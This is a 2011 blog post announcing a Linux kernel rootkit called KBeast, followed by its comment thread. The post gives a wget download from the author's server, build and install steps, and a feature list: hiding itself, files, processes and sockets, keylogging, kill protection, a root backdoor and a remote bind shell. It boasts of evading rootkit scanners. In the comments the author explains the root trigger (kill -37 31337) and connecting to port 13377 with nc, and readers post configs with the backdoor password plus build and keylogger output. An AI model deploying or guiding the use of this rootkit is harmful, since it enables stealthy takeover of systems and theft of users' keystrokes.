Close Panel

31

Dec

2011

[UPDATE] KBeast – The New Kernel Rootkit

By IPSECS Admin. Posted in Exploitation | 6 Comments »

KBeast (Kernel Beast) is new kernel rootkit based on the publicly known rootkit, modification is made in order to support kernel 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Actually it should work for kernel 2.6.9 up to 2.6.35 or more, but our installer script is only created for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are quick step installing the beast:

  • wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
  • tar zxvf ipsecs-kbeast-v1.tar.gz
  • cd kbeast-v1/
  • modify config.h to meet your requirement, remember that _MAGIC_NAME_ must be user with sh/bash shell
  • In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
  • In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build (actually it should work for the recent kernel)
  • In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat() related code, modify syscall table address manually, then execute ./setup build 0

Be kind to note that the beast has been tested in, but not limited to, kernel 2.6.9, 2.6.16, 2.6.18, 2.6.32, 2.6.35 (i386 or x86_64). The feature of this rootkit are:

  • Hiding this loadable kernel module
  • Hiding files/directory
  • Hiding process (ps, pstree, top, lsof)
  • Hiding socket and connections (netstat, lsof)
  • Keystroke logging to capture user activity
  • Anti-kill process
  • Anti-remove files
  • Anti-delete this loadable kernel modules
  • Local root escalation backdoor
  • Remote binding backdoor hidden by the kernel rootkit

During my test with chkrootkit and rkhunter, this rootkit wasn’t detected by those rootkit hunter. The limitation of my rootkit, you have to think yourself how to load the rootkit when the server rebooted. Believe me that is easy task, please see modification of init script here as example. Finally, you can download the kernel beast on core.ipsecs.com.

See Nightmare for Linux System Administrator, and Happy New Year 2012!

is
Email this author | All posts by | Subscribe to Entries (RSS)

 

6 Responses to “[UPDATE] KBeast – The New Kernel Rootkit”

  1. 1
    fans Says:

    Bisa diinstall mulus di ubuntu 10.04 saya mas hehehe

  2. 2
    Jay Says:

    Hey dude,

    I tried running the setup script but I don’t get the function checking the kernel headers
    HEADER_DIR=`ls -l $1|awk -F \> ‘{print $2}’`

    So we have ls $1, set \> as separator and print $2. why $1 and where in the output of ls can you find “>” as separator ?

    Sorry, am I missing something ?

  3. 3
    ipsec Says:

    Hi,
    It’s because some kernel headers installed as symbolic link for /lib/modules/`uname -r`/build. Between symbolic link and target directory is separated by >.
    So which kernel version do you use? running on what linux variant?

  4. 4
    Beverlee Lothian Says:

    It is highly helpful for me. Huge thumbs up for this blog post!

  5. 5
    Olivier Says:

    Thanks for this. Impressive.
    Just notice a bug :
    once loaded, “ps auxw” runs as expected but “ps auxw|less” shows the backdoor server process :
    bin 1302 0.0 0.0 0 0 ? Ss 01:24 0:00 ./_h4x_bd

    (debian squeeze).

    HTH.

  6. 6
    IPSECS Admin Says:

    Hi Oliver,
    Thanks for the feedback.
    *will work for the second version*
    Fixing process hiding and keylogging :)

  7. 7
    Euro Says:

    when will the second version?

  8. 8
    IPSECS Admin Says:

    there’s no plan about when the release time :-)

  9. 9
    Michael Says:

    Hi. I tested this on Debian 6 running 2.6.32 and it didn’t work for me — I edited config.h and changed the user to one with /bin/bash access. I only put the username and nothing else. I then ran ./build 0 as root, it says it successfully installed it. I then tried connecting via SSH using port “13377″ and the connection timed out. I also tried killing the PID “31337″ from a local account and it didn’t escalate privileges. I also kept this the same:

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    #define _H4X_PATH_ “/usr/_h4x_”

    and when I try to cd into that directory it says it’s not found. Am I doing something wrong?

  10. 10
    IPSECS Admin Says:

    Running ./setup build 0 must be failed in 2.6.32. But, you said that you were success? Anyway, as for kernel 2.6.32 and 2.6.35 you should run ./setup build 1.

    By default configuration, in order to escalate kill PID 31337 with signal 37 (kill -37 31337)

  11. 11
    Michael Says:

    Hi thanks for that, and yes it didn’t report it was unsuccessful at all. Also once it’s installed does it allow the attacker to ssh on port 13377 with the h4x3d password? Or do you use telnet

  12. 12
    IPSECS Admin Says:

    Use nc or ncat :)

  13. 13
    TimL Says:

    Yeah, Currently having the issue with process hiding.

    ps aux, ps auxw, or etc are showing it on this machine:
    Linux localhost 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux

    root@localhost:/usr/# ps aux|grep h4x
    root 1843 0.0 0.0 3456 772 pts/0 S+ 21:44 0:00 grep –color=auto h4x
    bin 31564 0.0 0.0 1680 60 ? Ss 19:48 0:00 ./_h4x_bd

  14. 14
    TimL Says:

    Adding onto my previous comment I’ve noticed slight system instability since the install on another system
    (GNU/Linux 2.6.38-8-generic-pae i686)

    Normal SSH login results in the following:
    Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-generic-pae i686)

    * Documentation: https://help.ubuntu.com/

    System information as of Sun Feb 19 15:04:05 WIT 2012

    System load: 0.03 Processes: 82
    Usage of /home: 18.8% of 64.17GB Users logged in: 0
    Memory usage: 21% IP address for eth1: 202.****
    Swap usage: 0%

    Graph this data and manage this system at https://landscape.canonical.com/
    New release ‘oneiric’ available.
    Run ‘do-release-upgrade’ to upgrade to it.

    Last login: Sun Feb 19 15:01:29 2012 from 202.***
    root@gamma:~$ Connection to 202.*** closed.

    Where Kbeast BD does just about the same:
    C:\>nc 202.** 13377

    ::::::::::: ::::::::: :::::::: :::::::::: :::::::: ::::::::
    :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
    +:+ +:+ +:+ +:+ +:+ +:+ +:+
    +#+ +#++:++#+ +#++:++#++ +#++:++# +#+ +#++:++#++
    +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+# #+# #+# #+# #+# #+#
    ########### ### ######## ########## ######## ########

    Password [displayed to screen]: password
    <>
    bash: no job control in this shell
    bin@gamma:/usr/_h4x_$

    (Stops responding here)

    Just figured I’d give some bug insight with as much system info as I’m able to obtain for hopes that future versions might have more stability/less bugs.

  15. 15
    IPSECS Admin Says:

    Hi There,
    > ps aux|grep -> if ps is piped to other command, yes it’s detected since the hidden process depends on sys_write modification which is only applied in some commands
    > I haven’t tried in 2.6.38, but there are certainly some memory leaks that should be fixed during my trial on busy servers.

    - Thx for the feedback

  16. 16
    TimL Says:

    Just to note it showed with or without |grep on there so it wasn’t just the pipe leading to the other command.

    It was showing in general with any ps command, I just used grep to demonstrate it was being showed without thinking about the fact it was being piped…

  17. 17
    TimL Says:

    Another suggestion you should add into keylogging is get it to log the contents input into commands like “su” currently it doesn’t seem to do so.

    [20/02/2012-11:16:27] – [UID = 505 ] bash > su
    [20/02/2012-11:16:32] – [UID = 505 ] bash > su
    [20/02/2012-11:16:38] – [UID = 505 ] bash > su
    [20/02/2012-11:16:46] – [UID = 505 ] bash > su
    [20/02/2012-11:16:53] – [UID = 505 ] bash > su
    [20/02/2012-11:16:59] – [UID = 505 ] bash > su
    [20/02/2012-11:27:28] – [UID = 505 ] bash > exit

    Sure if you were to SSH into another system from the one you’re on it would log the details entered (I’ve tested that and it works) however while using “su” on the local machine I guess whatever functionality it uses to detect the keys pressed the keylogging functionality isn’t hooking that area of the kernel.

    Btw, it’s still some great work more then I could’ve accomplished myself to be honest and I love that you’re trying to give it compatibility with multiple kernel versions instead of relying on the host machine to be within a set kernel.

  18. 18
    jeandez Says:

    Hi !!!
    i’m trying to install kbeast for testing. I’m editing config.h file but i dont understand the aim of that step:
    /* Magic signal & pid for local escalation */
    #define _MAGIC_SIG_ 37 //Kill signal
    #define _MAGIC_PID_ 31337 //kill this pid

    Also can you give me help to use kbeast remotely ??
    i created a user with useradd command, in order to use it as _MAGIC_NAME_ is it correct??
    once config.h edited , what have i to do for kbeast running ??
    thank you !!

  19. 19
    Rootkit 32 | Sellmyname Says:

    [...] IT Security – [UPDATE] KBeast – The New Kernel Rootkit [...]

  20. 20
    IPSECS Admin Says:

    Hi, MAGIC_SIGNAL & MAGIC_PID is to escalate to root kill -37 31337 as example. By default install it should be possible to access it remotely using nc/ncat to port 13377. It’s better for you to use current existing username,

  21. 21
    jeandez Says:

    i use fedora16 as a remote host and try to connect to port 13377 on my ubuntu( kernel 2.6.32-34)with netcat but it doesn’t work.
    this is what i get : [root@bi kouad]#nc -z 192.168.1.2 13377
    [root@bi kouad]#
    192.168.1.2 is my ubuntu IP.

    please look at my config.h file and tell me if there is something that goes wrong
    /*Don’t change this line*/
    define TRUE 1
    define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    define KBEAST “kbeast”

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ “_h4x_”

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    define _H4X_PATH_ “/usr/_h4x_/_H4XOR_DEZ”

    /*
    File to save key logged data
    */
    #define _LOGFILE_ “acctlog”

    /*
    This port will be hidded from netstat
    */
    define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    define _RPASSWORD_ “h4x3d”
    define _MAGIC_NAME_ “rootkit”
    /*
    Magic signal & pid for local escalation
    */
    define _MAGIC_SIG_ 37 //kill signal
    define _MAGIC_PID_ 31337 //kill this pid

    //rootkit is a user that i added with useradd command

    Also when i did ./setup build i got:
    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [NOT OK] // i think there is a problem there.

    thank you for your help !!

  22. 22
    jeandez Says:

    …hi
    i use fedora16 as a remote host and try to connect to port 13377 on my ubuntu( kernel 2.6.32-34)with netcat but it doesn’t work.
    this is what i get : [root@bi kouad]#nc -z 192.168.1.2 13377
    [root@bi kouad]#
    192.168.1.2 is my ubuntu IP.

    please look at my config.h file and tell me if there is something that goes wrong
    /*Don’t change this line*/
    define TRUE 1
    define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    define KBEAST “kbeast”

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ “_h4x_”

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    define _H4X_PATH_ “/usr/_h4x_/_H4XOR_DEZ”

    /*
    File to save key logged data
    */
    #define _LOGFILE_ “acctlog”

    /*
    This port will be hidded from netstat
    */
    define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    define _RPASSWORD_ “h4x3d”
    define _MAGIC_NAME_ “rootkit”
    /*
    Magic signal & pid for local escalation
    */
    define _MAGIC_SIG_ 37 //kill signal
    define _MAGIC_PID_ 31337 //kill this pid

    //rootkit is a user that i added with useradd command

    Also when i did ./setup build i got:
    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [NOT OK] // i think there is a problem there.

    thank you for your help !!

  23. 23
    jeandez Says:

    now , i get problem with compiling kernel Module:

    compiling kernel Module : [not OK]

  24. 24
    jeandez Says:

    Today i tried to install kbeast on ubuntu 10.10 (kernel 2.6.35), i got that when ./setup build 1

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [NOT OK] //can you help me !!!

    i got the same thing with my older ubuntu(kernel 2.6.32-34).
    what happened ???? because the first time i installed kbeast (on my ubuntu kernel 2.6.32) i got ‘compiling kernel Module : [ok],
    perhaps after updating it (but the kernel still remain 2.6.32) a problem occured.
    thank you !!

  25. 25
    anonymous Says:

    Jeandez,
    Can you go to the H4X PATH directory, type ‘make’ and paste the result here?

  26. 26
    jeandez Says:

    ok, this is what i got when doing a “make” in H4X PATH

    kangaman@bi-laptop:/usr/_h4x_/_H4X0R_dez$ make

    make -C /lib/modules/2.6.32-34-generic/build M=/usr/_h4x_/_H4X0R_dez modules
    make[1]: entrant dans le répertoire « /usr/src/linux-headers-2.6.32-34-generic »
    CC [M] /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o
    In file included from /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:34:
    /usr/_h4x_/_H4X0R_dez/config.h:8: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘TRUE’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: its scope is only this definition or declaration, which is probably not what you want
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: error: conflicting types for ‘epoch2time’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: note: previous declaration of ‘epoch2time’ was here
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘epoch2time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:130: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:132: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:133: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:141: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:142: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:148: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:149: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘get_time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: error: storage size of ‘tm’ isn’t known
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: warning: unused variable ‘tm’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘log_to_file’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: ‘_H4X_PATH_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: (Each undeclared identifier is reported only once
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: for each function it appears in.)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_tcp4_seq_show’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:221: error: ‘_HIDE_PORT_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:242: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:479: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:570: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:585: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:599: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:615: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:632: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_kill’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:649: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_SIG_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_PID_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:665: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘init’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:684: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:694: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:695: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘exit’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:734: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:741: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
    make[2]: *** [/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o] Erreur 1
    make[1]: *** [_module_/usr/_h4x_/_H4X0R_dez] Erreur 2
    make[1]: quittant le répertoire « /usr/src/linux-headers-2.6.32-34-generic »
    make: *** [all] Erreur 2

    thank you !!

  27. 27
    jeandez Says:

    hi anonymous , i try “make” on my ubuntu(kernel 2.6.35) this what i get :
    root@bob:/usr/_h4x_/_H4X0R_dez# make
    make -C /lib/modules/2.6.35-22-generic/build M=/usr/_h4x_/_H4X0R_dez modules
    make[1]: Entering directory `/usr/src/linux-headers-2.6.35-22-generic’
    CC [M] /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o
    In file included from /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:34:
    /usr/_h4x_/_H4X0R_dez/config.h:8: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘TRUE’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: its scope is only this definition or declaration, which is probably not what you want
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: error: conflicting types for ‘epoch2time’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: note: previous declaration of ‘epoch2time’ was here
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘epoch2time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:130: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:132: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:133: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:141: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:142: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:148: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:149: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘get_time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: error: storage size of ‘tm’ isn’t known
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: warning: unused variable ‘tm’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘log_to_file’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: ‘_H4X_PATH_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: (Each undeclared identifier is reported only once
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: for each function it appears in.)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_tcp4_seq_show’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:221: error: ‘_HIDE_PORT_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:242: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:479: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:570: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:585: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:599: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:615: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:632: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_kill’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:649: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_SIG_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_PID_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:665: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘init’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:684: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:694: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:695: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
